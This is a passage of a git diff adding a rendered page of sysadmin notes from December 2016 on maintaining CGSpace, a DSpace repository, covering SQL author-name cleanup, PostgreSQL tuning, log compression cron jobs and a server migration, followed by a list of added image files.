+ Thorne-Lyman, A. | 0781e13a-1dc8-4e3f-82e8-5c422b44a344 |         -1
+ Thorne, M. D.    | 54c52649-cefd-438d-893f-3bcef3702f07 |         -1
+ Thorne, P.J      | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+ Thorne, P.       | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+(6 rows)
+</code></pre><ul>
+<li>I generated a new UUID using <code>uuidgen | tr [A-Z] [a-z]</code> and set it along with correct name variation for all records:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b2f7603d-2fb5-4018-923a-c4ec8d85b3bb&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;;
+UPDATE 43
+</code></pre><ul>
+<li>Apparently we also need to normalize Phil Thornton&rsquo;s names to <code>Thornton, Philip K.</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
+     text_value      |              authority               | confidence
+---------------------+--------------------------------------+------------
+ Thornton, P         | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P K.      | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P K       | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton. P.K.      | 3e1e6639-d4fb-449e-9fce-ce06b5b0f702 |         -1
+ Thornton, P K .     | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P.K.      | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P.K       | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, Philip K  | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, Philip K. | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P. K.     | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+(10 rows)
+</code></pre><ul>
+<li>Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
+UPDATE 362
+</code></pre><ul>
+<li>It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)</li>
+<li>Everything looks ok after authority and discovery reindex</li>
+<li>In other news, I think we should really be using more RAM for PostgreSQL&rsquo;s <code>shared_buffers</code></li>
+<li>The <a href="https://www.postgresql.org/docs/9.5/static/runtime-config-resource.html">PostgreSQL documentation</a> recommends using 25% of the system&rsquo;s RAM on dedicated systems, but we should use a bit less since we also have a massive JVM heap and also benefit from some RAM being used by the OS cache</li>
+</ul>
+<h2 id="2016-12-09">2016-12-09</h2>
+<ul>
+<li>More work on finishing rough draft of KM4Dev article</li>
+<li>Set PostgreSQL&rsquo;s <code>shared_buffers</code> on CGSpace to 10% of system RAM (1200MB)</li>
+<li>Run the following author corrections on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;34df639a-42d8-4867-a3f2-1892075fcb3f&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39; or authority=&#39;021cd183-946b-42bb-964e-522ebff02993&#39;;
+dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
+</code></pre><ul>
+<li>The authority IDs were different now than when I was looking a few days ago so I had to adjust them here</li>
+</ul>
+<h2 id="2016-12-11">2016-12-11</h2>
+<ul>
+<li>After enabling a sizable <code>shared_buffers</code> for CGSpace&rsquo;s PostgreSQL configuration the number of connections to the database dropped significantly</li>
+</ul>
+<p><img src="/cgspace-notes/2016/12/postgres_bgwriter-week.png" alt="postgres_bgwriter-week">
+<img src="/cgspace-notes/2016/12/postgres_connections_ALL-week.png" alt="postgres_connections_ALL-week"></p>
+<ul>
+<li>Looking at CIAT records from last week again, they have a lot of double authors like:</li>
+</ul>
+<pre tabindex="0"><code>International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::600
+International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::500
+International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::0
+</code></pre><ul>
+<li>Some in the same <code>dc.contributor.author</code> field, and some in others like <code>dc.contributor.author[en_US]</code> etc</li>
+<li>Removing the duplicates in OpenRefine and uploading a CSV to DSpace says &ldquo;no changes detected&rdquo;</li>
+<li>Seems like the only way to sortof clean these up would be to start in SQL:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Center for Tropical Agriculture&#39;;
+                  text_value                   |              authority               | confidence
+-----------------------------------------------+--------------------------------------+------------
+ International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |         -1
+ International Center for Tropical Agriculture |                                      |        600
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |        500
+ International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |        600
+ International Center for Tropical Agriculture |                                      |         -1
+ International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |        500
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |        600
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |         -1
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |          0
+dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
+UPDATE 1693
+dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, text_value=&#39;International Center for Tropical Agriculture&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%CIAT%&#39;;
+UPDATE 35
+</code></pre><ul>
+<li>Work on article for KM4Dev journal</li>
+</ul>
+<h2 id="2016-12-13">2016-12-13</h2>
+<ul>
+<li>Checking in on CGSpace postgres stats again, looks like the <code>shared_buffers</code> change from a few days ago really made a big impact:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/12/postgres_bgwriter-week-2016-12-13.png" alt="postgres_bgwriter-week">
+<img src="/cgspace-notes/2016/12/postgres_connections_ALL-week-2016-12-13.png" alt="postgres_connections_ALL-week"></p>
+<ul>
+<li>Looking at logs, it seems we need to evaluate which logs we keep and for how long</li>
+<li>Basically the only ones we <em>need</em> are <code>dspace.log</code> because those are used for legacy statistics (need to keep for 1 month)</li>
+<li>Other logs will be an issue because they don&rsquo;t have date stamps</li>
+<li>I will add date stamps to the logs we&rsquo;re storing from the tomcat7 user&rsquo;s cron jobs at least, using: <code>$(date --iso-8601)</code></li>
+<li>Would probably be better to make custom logrotate files for them in the future</li>
+<li>Clean up some unneeded log files from 2014 (they weren&rsquo;t large, just don&rsquo;t need them)</li>
+<li>So basically, new cron jobs for logs should look something like this:</li>
+<li>Find any file named <code>*.log*</code> that isn&rsquo;t <code>dspace.log*</code>, isn&rsquo;t already zipped, and is older than one day, and zip it:</li>
+</ul>
+<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &#34;.*\.log.*&#34; ! -iregex &#34;.*dspace\.log.*&#34; ! -iregex &#34;.*\.(gz|lrz|lzo|xz)&#34; ! -newermt &#34;Yesterday&#34; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
+</code></pre><ul>
+<li>Since there is <code>xzgrep</code> and <code>xzless</code> we can actually just zip them after one day, why not?!</li>
+<li>We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that</li>
+<li>I use <code>schedtool -B</code> and <code>ionice -c2 -n7</code> to set the CPU scheduling to <code>SCHED_BATCH</code> and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less</li>
+<li>When the tasks are running you can see that the policies do apply:</li>
+</ul>
+<pre tabindex="0"><code>$ schedtool $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;) &amp;&amp; ionice -p $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;)
+PID 17049: PRIO   0, POLICY B: SCHED_BATCH   , NICE   0, AFFINITY 0xf
+best-effort: prio 7
+</code></pre><ul>
+<li>All in all this should free up a few gigs (we were at 9.3GB free when I started)</li>
+<li>Next thing to look at is whether we need Tomcat&rsquo;s access logs</li>
+<li>I just looked and it seems that we saved 10GB by zipping these logs</li>
+<li>Some users pointed out issues with the &ldquo;most popular&rdquo; stats on a community or collection</li>
+<li>This error appears in the logs when you try to view them:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-13 21:17:37,486 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
+	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
+	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
+	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:789)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:111)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:274)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+	at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+	at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+	at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+	at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+	at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+	at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+	at com.atmire.statistics.generator.TopNDSODatasetGenerator.toDatasetQuery(SourceFile:39)
+	at com.atmire.statistics.display.StatisticsDataVisitsMultidata.createDataset(SourceFile:108)
+	at org.dspace.statistics.content.StatisticsDisplay.createDataset(SourceFile:384)
+	at org.dspace.statistics.content.StatisticsDisplay.getDataset(SourceFile:404)
+	at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generateJsonData(SourceFile:170)
+	at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generate(SourceFile:246)
+	at com.atmire.app.xmlui.aspect.statistics.JSONStatsMostPopular.generate(JSONStatsMostPopular.java:145)
+	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</code></pre><ul>
+<li>It happens on development and production, so I will have to ask Atmire</li>
+<li>Most likely an issue with installation/configuration</li>
+</ul>
+<h2 id="2016-12-14">2016-12-14</h2>
+<ul>
+<li>Atmire sent a quick fix for the <code>last-update.txt</code> file not found error</li>
+<li>After applying pull request <a href="https://github.com/ilri/DSpace/pull/291">#291</a> on DSpace Test I no longer see the error in the logs after the <code>UpdateSolrStorageReports</code> task runs</li>
+<li>Also, I&rsquo;m toying with the idea of moving the <code>tomcat7</code> user&rsquo;s cron jobs to <code>/etc/cron.d</code> so we can manage them in Ansible</li>
+<li>Made a pull request with a template for the cron jobs (<a href="https://github.com/ilri/rmg-ansible-public/pull/75">#75</a>)</li>
+<li>Testing SMTP from the new CGSpace server and it&rsquo;s not working, I&rsquo;ll have to tell James</li>
+</ul>
+<h2 id="2016-12-15">2016-12-15</h2>
+<ul>
+<li>Start planning for server migration this weekend, letting users know</li>
+<li>I am trying to figure out what the process is to <a href="http://handle.net/hnr_support.html">update the server&rsquo;s IP in the Handle system</a>, and emailing the hdladmin account bounces(!)</li>
+<li>I will contact the Jane Euler directly as I know I&rsquo;ve corresponded with her in the past</li>
+<li>She said that I should indeed just re-run the <code>[dspace]/bin/dspace make-handle-config</code> command and submit the new <code>sitebndl.zip</code> file to the CNRI website</li>
+<li>Also I was troubleshooting some workflow issues from Bizuwork</li>
+<li>I re-created the same scenario by adding a non-admin account and submitting an item, but I was able to successfully approve and commit it</li>
+<li>So it turns out it&rsquo;s not a bug, it&rsquo;s just that Peter was added as a reviewer/admin AFTER the items were submitted</li>
+<li>This is how DSpace works, and I need to ask if there is a way to override someone&rsquo;s submission, as the other reviewer seems to not be paying attention, or has perhaps taken the item from the task pool?</li>
+<li>Run a batch edit to add &ldquo;RANGELANDS&rdquo; ILRI subject to all items containing the word &ldquo;RANGELANDS&rdquo; in their metadata for Peter Ballantyne</li>
+</ul>
+<p><img src="/cgspace-notes/2016/12/batch-edit1.png" alt="Select all items with &amp;ldquo;rangelands&amp;rdquo; in metadata">
+<img src="/cgspace-notes/2016/12/batch-edit2.png" alt="Add RANGELANDS ILRI subject"></p>
+<h2 id="2016-12-18">2016-12-18</h2>
+<ul>
+<li>Add four new CRP subjects for 2017 and sort the input forms alphabetically (<a href="https://github.com/ilri/DSpace/pull/294">#294</a>)</li>
+<li>Test the SMTP on the new server and it&rsquo;s working</li>
+<li>Last week, when we asked CGNET to update the DNS records this weekend, they misunderstood and did it immediately</li>
+<li>We quickly told them to undo it, but I just realized they didn&rsquo;t undo the IPv6 AAAA record!</li>
+<li>None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then</li>
+<li>Update some names and authorities in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;5ff35043-942e-4d0a-b377-4daed6e3c1a3&#39;, confidence=600, text_value=&#39;Duncan, Alan&#39; where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*Duncan,? A.*&#39;;
+UPDATE 204
+dspace=# update metadatavalue set authority=&#39;46804b53-ea30-4a85-9ccf-b79a35816fa9&#39;, confidence=600, text_value=&#39;Mekonnen, Kindu&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Mekonnen, K%&#39;;
+UPDATE 89
+dspace=# update metadatavalue set authority=&#39;f840da02-26e7-4a74-b7ba-3e2b723f3684&#39;, confidence=600, text_value=&#39;Lukuyu, Ben A.&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Lukuyu, B%&#39;;
+UPDATE 140
+</code></pre><ul>
+<li>Generated a new UUID for Ben using <code>uuidgen | tr [A-Z] [a-z]</code> as the one in Solr had his ORCID but the name format was incorrect</li>
+<li>In theory DSpace should be able to check names from ORCID and update the records in the database, but I find that this doesn&rsquo;t work (see Jira bug <a href="https://jira.duraspace.org/browse/DS-3302">DS-3302</a>)</li>
+<li>I need to run these updates along with the other one for CIAT that I found last week</li>
+<li>Enable OCSP stapling for hosts &gt;= Ubuntu 16.04 in our Ansible playbooks (<a href="https://github.com/ilri/rmg-ansible-public/pull/76">#76</a>)</li>
+<li>Working for DSpace Test on the second response:</li>
+</ul>
+<pre tabindex="0"><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
+...
+OCSP response: no response sent
+$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
+...
+OCSP Response Data:
+...
+    Cert Status: good
+</code></pre><ul>
+<li>Migrate CGSpace to new server, roughly following these steps:</li>
+<li>On old server:</li>
+</ul>
+<pre tabindex="0"><code># service tomcat7 stop
+# /home/backup/scripts/postgres_backup.sh
+</code></pre><ul>
+<li>On new server:</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop tomcat7
+# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/assetstore/ /home/cgspace.cgiar.org/assetstore/
+# rsync -4 -av --delete 178.79.187.182:/home/backup/ /home/backup/
+# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/solr/ /home/cgspace.cgiar.org/solr
+# su - postgres
+$ dropdb cgspace
+$ createdb -O cgspace --encoding=UNICODE cgspace
+$ psql cgspace -c &#39;alter user cgspace createuser;&#39;
+$ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
+$ psql cgspace -c &#39;alter user cgspace nocreateuser;&#39;
+$ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
+$ vacuumdb cgspace
+$ psql cgspace
+postgres=# \i /tmp/author-authority-updates-2016-12-11.sql
+postgres=# \q
+$ exit
+# chown -R tomcat7:tomcat7 /home/cgspace.cgiar.org
+# rsync -4 -av 178.79.187.182:/home/cgspace.cgiar.org/log/*.dat /home/cgspace.cgiar.org/log/
+# rsync -4 -av 178.79.187.182:/home/cgspace.cgiar.org/log/dspace.log.2016-1[12]* /home/cgspace.cgiar.org/log/
+# su - tomcat7
+$ cd src/git/DSpace/dspace/target/dspace-installer
+$ ant update clean_backups
+$ exit
+# systemctl start tomcat7
+</code></pre><ul>
+<li>It took about twenty minutes and afterwards I had to check a few things, like:
+<ul>
+<li>check and enable systemd timer for let&rsquo;s encrypt</li>
+<li>enable root cron jobs</li>
+<li>disable root cron jobs on old server after!</li>
+<li>enable tomcat7 cron jobs</li>
+<li>disable tomcat7 cron jobs on old server after!</li>
+<li>regenerate <code>sitebndl.zip</code> with new IP for handle server and submit it to Handle.net</li>
+</ul>
+</li>
+</ul>
+<h2 id="2016-12-22">2016-12-22</h2>
+<ul>
+<li>Abenet wanted a CSV of the IITA community, but the web export doesn&rsquo;t include the <code>dc.date.accessioned</code> field</li>
+<li>I had to export it from the command line using the <code>-a</code> flag:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
+</code></pre><h2 id="2016-12-28">2016-12-28</h2>
+<ul>
+<li>We&rsquo;ve been getting two alerts per day about CPU usage on the new server from Linode</li>
+<li>These are caused by the batch jobs for Solr etc that run in the early morning hours</li>
+<li>The Linode default is to alert at 90% CPU usage for two hours, but I see the old server was at 150%, so maybe we just need to adjust it</li>
+<li>Speaking of the old server (linode01), I think we can decommission it now</li>
+<li>I checked the S3 logs on the new server (linode18) to make sure the backups have been running and everything looks good</li>
+<li>In other news, I was looking at the Munin graphs for PostgreSQL on the new server and it looks slightly worrying:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/12/postgres_size_ALL-week.png" alt="munin postgres stats"></p>
+<ul>
+<li>I will have to check later why the size keeps increasing</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016/01/xmlui-subjects-after.png b/docs/2016/01/xmlui-subjects-after.png
new file mode 100644
index 000000000..bce717356
Binary files /dev/null and b/docs/2016/01/xmlui-subjects-after.png differ
diff --git a/docs/2016/01/xmlui-subjects-before.png b/docs/2016/01/xmlui-subjects-before.png
new file mode 100644
index 000000000..3664c12e6
Binary files /dev/null and b/docs/2016/01/xmlui-subjects-before.png differ
diff --git a/docs/2016/02/cgspace-countries.png b/docs/2016/02/cgspace-countries.png
new file mode 100644
index 000000000..0070f09c8
Binary files /dev/null and b/docs/2016/02/cgspace-countries.png differ
diff --git a/docs/2016/02/submit-button-drylands.png b/docs/2016/02/submit-button-drylands.png
new file mode 100644
index 000000000..eea073186
Binary files /dev/null and b/docs/2016/02/submit-button-drylands.png differ
diff --git a/docs/2016/02/submit-button-ilri.png b/docs/2016/02/submit-button-ilri.png
new file mode 100644
index 000000000..7b2064904
Binary files /dev/null and b/docs/2016/02/submit-button-ilri.png differ
diff --git a/docs/2016/03/bioversity-thumbnail-bad.jpg b/docs/2016/03/bioversity-thumbnail-bad.jpg
new file mode 100644
index 000000000..53e7ed35f
Binary files /dev/null and b/docs/2016/03/bioversity-thumbnail-bad.jpg differ
diff --git a/docs/2016/03/bioversity-thumbnail-good.jpg b/docs/2016/03/bioversity-thumbnail-good.jpg
new file mode 100644
index 000000000..02a6e8313
Binary files /dev/null and b/docs/2016/03/bioversity-thumbnail-good.jpg differ
diff --git a/docs/2016/03/cua-label-mixup.png b/docs/2016/03/cua-label-mixup.png
new file mode 100644
index 000000000..faff0b308
Binary files /dev/null and b/docs/2016/03/cua-label-mixup.png differ
diff --git a/docs/2016/03/google-index.png b/docs/2016/03/google-index.png
new file mode 100644
index 000000000..a02c5fe96
Binary files /dev/null and b/docs/2016/03/google-index.png differ
diff --git a/docs/2016/03/missing-xmlui-string.png b/docs/2016/03/missing-xmlui-string.png
new file mode 100644
index 000000000..7119dcfd3
Binary files /dev/null and b/docs/2016/03/missing-xmlui-string.png differ
diff --git a/docs/2016/03/url-parameters.png b/docs/2016/03/url-parameters.png
new file mode 100644
index 000000000..27aeb1e6d
Binary files /dev/null and b/docs/2016/03/url-parameters.png differ
diff --git a/docs/2016/03/url-parameters2.png b/docs/2016/03/url-parameters2.png
new file mode 100644
index 000000000..39ab4d681
Binary files /dev/null and b/docs/2016/03/url-parameters2.png differ
diff --git a/docs/2016/05/discovery-types.png b/docs/2016/05/discovery-types.png
new file mode 100644
index 000000000..5652cb554
Binary files /dev/null and b/docs/2016/05/discovery-types.png differ
diff --git a/docs/2016/06/xmlui-altmetric-sharing.png b/docs/2016/06/xmlui-altmetric-sharing.png
new file mode 100644
index 000000000..594cf3dd7
Binary files /dev/null and b/docs/2016/06/xmlui-altmetric-sharing.png differ
diff --git a/docs/2016/07/cgspace-about-page.png b/docs/2016/07/cgspace-about-page.png
new file mode 100644
index 000000000..483fc860e
Binary files /dev/null and b/docs/2016/07/cgspace-about-page.png differ
diff --git a/docs/2016/08/dspace55-ubuntu16.04.png b/docs/2016/08/dspace55-ubuntu16.04.png
new file mode 100644
index 000000000..0026da85c
Binary files /dev/null and b/docs/2016/08/dspace55-ubuntu16.04.png differ
diff --git a/docs/2016/08/nodejs-nginx.png b/docs/2016/08/nodejs-nginx.png
new file mode 100644
index 000000000..077b174f2
Binary files /dev/null and b/docs/2016/08/nodejs-nginx.png differ
diff --git a/docs/2016/09/cgspace-search.png b/docs/2016/09/cgspace-search.png
new file mode 100644
index 000000000..5321987bc
Binary files /dev/null and b/docs/2016/09/cgspace-search.png differ
diff --git a/docs/2016/09/dspacetest-search.png b/docs/2016/09/dspacetest-search.png
new file mode 100644
index 000000000..c085aec6d
Binary files /dev/null and b/docs/2016/09/dspacetest-search.png differ
diff --git a/docs/2016/09/google-webmaster-tools-index.png b/docs/2016/09/google-webmaster-tools-index.png
new file mode 100644
index 000000000..bf5aa6e20
Binary files /dev/null and b/docs/2016/09/google-webmaster-tools-index.png differ
diff --git a/docs/2016/09/ilri-ldap-users.png b/docs/2016/09/ilri-ldap-users.png
new file mode 100644
index 000000000..39ebd3766
Binary files /dev/null and b/docs/2016/09/ilri-ldap-users.png differ
diff --git a/docs/2016/09/tomcat_jvm-day.png b/docs/2016/09/tomcat_jvm-day.png
new file mode 100644
index 000000000..5eedce2a1
Binary files /dev/null and b/docs/2016/09/tomcat_jvm-day.png differ
diff --git a/docs/2016/09/tomcat_jvm-month.png b/docs/2016/09/tomcat_jvm-month.png
new file mode 100644
index 000000000..2dae49337
Binary files /dev/null and b/docs/2016/09/tomcat_jvm-month.png differ
diff --git a/docs/2016/09/tomcat_jvm-week.png b/docs/2016/09/tomcat_jvm-week.png
new file mode 100644
index 000000000..9e9b24fab
Binary files /dev/null and b/docs/2016/09/tomcat_jvm-week.png differ
diff --git a/docs/2016/10/bootstrap-issue.png b/docs/2016/10/bootstrap-issue.png
new file mode 100644
index 000000000..bf8c73b64
Binary files /dev/null and b/docs/2016/10/bootstrap-issue.png differ
diff --git a/docs/2016/10/cgspace-icons.png b/docs/2016/10/cgspace-icons.png
new file mode 100644
index 000000000..f2053e6d7
Binary files /dev/null and b/docs/2016/10/cgspace-icons.png differ
diff --git a/docs/2016/10/cmyk-vs-srgb.jpg b/docs/2016/10/cmyk-vs-srgb.jpg
new file mode 100644
index 000000000..2ff62cef6
Binary files /dev/null and b/docs/2016/10/cmyk-vs-srgb.jpg differ
diff --git a/docs/2016/10/dspacetest-fontawesome-icons.png b/docs/2016/10/dspacetest-fontawesome-icons.png
new file mode 100644
index 000000000..594cc948d
Binary files /dev/null and b/docs/2016/10/dspacetest-fontawesome-icons.png differ
diff --git a/docs/2016/11/dspacetest-tomcat-jvm-day.png b/docs/2016/11/dspacetest-tomcat-jvm-day.png
new file mode 100644
index 000000000..422b70166
Binary files /dev/null and b/docs/2016/11/dspacetest-tomcat-jvm-day.png differ
diff --git a/docs/2016/11/dspacetest-tomcat-jvm-week.png b/docs/2016/11/dspacetest-tomcat-jvm-week.png
new file mode 100644
index 000000000..6dcd2c253
Binary files /dev/null and b/docs/2016/11/dspacetest-tomcat-jvm-week.png differ
diff --git a/docs/2016/11/listings-and-reports-55.png b/docs/2016/11/listings-and-reports-55.png
